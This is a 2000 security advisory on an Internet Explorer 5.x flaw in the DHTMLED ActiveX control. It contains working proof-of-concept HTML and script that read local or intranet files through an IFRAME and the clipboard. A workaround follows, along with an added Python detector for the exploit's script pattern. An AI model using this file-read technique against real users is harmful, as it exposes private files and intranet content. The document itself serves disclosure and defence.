Georgi Guninski security advisory #16, 2000

IE 5.5 and 5.01 vulnerability - reading at least text and parsed HTML files from the local disk and from any host

Systems affected: IE 5.5, 5.01 / Win98 - probably other versions as well, not tested
Risk: Medium

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.5 and 5.01 under Windows 98 (presumably all other versions are also vulnerable) allow reading text and parsed HTML files from the local disk and from any host.
A particular danger is reading parsed web pages from intranet web servers behind a firewall.
It is exploitable from an HTML email message in Outlook.
This is achieved with the DHTMLED ActiveX control.

Details:
The problem is the DHTMLED control (DHTML Edit Control Safe for Scripting for IE5), which is used for basic HTML editing.
It allows opening a page containing an IFRAME but has problems with DOM protection.
It is possible to select the content of the IFRAME (which may be a document residing anywhere, including the local disk), copy it to the clipboard and then read it back from the clipboard. I have a feeling DHTMLED in combination with IFRAME may lead to more dangerous security risks.

The code is:
------dh2.html--------------------------------
<SCRIPT>
// "dh" is the DHTMLED control instance and "S1" the text field used as the
// paste target; their markup is not included in this excerpt.
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
// Select and copy the IFRAME's document (the local file) through the
// control's DOM, then paste it into the page's own text field and read it.
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
// Load the page that embeds the IFRAME into the edit control, then give it
// a few seconds to render before copying.
dh.loadURL("http://www.guninski.com/ifr2.html");
//                 ^^^^^^^^^^^^^^ You may need to edit this
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

A demonstration is available.

Workaround: Disable Active Scripting, or disable "Run ActiveX controls and plug-ins" (other workarounds probably exist).
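Besides the workaround, a mail or proxy filter can look for the script pattern the proof of concept above relies on. The following is an added example (not part of the original advisory) that scans inline scripts for the loadURL / selectall / copy / paste chain; the sample pages are constructed here, and the pattern names are assumptions for illustration.

```python
import re

# Indicators taken from the dh2.html proof of concept: a document loaded into
# the edit control, selected and copied through its DOM, then pasted back.
PATTERNS = {
    "loadURL": re.compile(r"\.loadURL\s*\(", re.I),
    "dom_access": re.compile(r"\.DOM\.all\.", re.I),
    "selectall": re.compile(r"execCommand\s*\(\s*['\"]selectall['\"]", re.I),
    "copy": re.compile(r"execCommand\s*\(\s*['\"]copy['\"]", re.I),
    "paste": re.compile(r"execCommand\s*\(\s*['\"]paste['\"]", re.I),
}

def script_blocks(html):
    """Return the bodies of all inline <script> blocks (case-insensitive)."""
    return re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S)

def scan_html(html):
    """Return the set of indicator names found in the page's inline scripts."""
    hits = set()
    for block in script_blocks(html):
        for name, pat in PATTERNS.items():
            if pat.search(block):
                hits.add(name)
    return hits

def is_suspicious(html):
    """Flag only the complete chain: a document loaded into the control,
    copied, and pasted back into the page. A lone execCommand("copy") is
    common in benign pages and is not enough on its own."""
    return {"loadURL", "copy", "paste"} <= scan_html(html)

# Constructed samples: the script portion of dh2.html above, and a benign
# copy-to-clipboard page that must not be flagged.
POC_HTML = """<SCRIPT>
function f1()
{
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
}
function loadit()
{
dh.loadURL("http://www.guninski.com/ifr2.html");
}
</SCRIPT>"""
BENIGN_HTML = """<html><script>
function copyLink() { document.execCommand("copy"); }
</script><body onload="copyLink()">hello</body></html>"""
```

The check is a heuristic: it catches the chain as written in the advisory, not obfuscated variants, so treat a hit as a reason to quarantine and inspect rather than as proof.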

Copyright 2000 Georgi Guninski